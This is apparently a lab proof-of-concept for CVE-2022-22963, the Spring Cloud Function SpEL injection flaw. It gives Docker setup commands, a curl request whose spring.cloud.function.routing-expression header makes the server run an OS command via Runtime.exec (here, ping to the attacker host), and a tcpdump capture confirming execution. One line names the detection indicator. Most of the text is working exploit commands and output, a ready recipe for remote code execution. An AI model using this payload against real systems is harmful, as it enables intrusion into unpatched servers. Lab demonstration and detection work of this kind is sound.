$ git clone https://github.com/twseptian/cve-2022-22963.git
$ cd cve-2022-22963
$ docker build . -t spring-spel-0day
$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")
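Run the ping command by sending the request below with the routing-expression header, then capture the responses on the attacker machine (172.17.0.1, the host side of docker0):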
$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter'
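Responses: the ICMP echo requests sent from the container (172.17.0.2) to 172.17.0.1 show that the expression in the header was evaluated and the command ran. For detection, a request to /functionRouter that carries a spring.cloud.function.routing-expression header is the indicator to look for in proxy or application logs.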
$ sudo tcpdump icmp -i docker0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64
13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64
13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64
13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64
13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64
13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64
13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64
13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64
13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64
13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64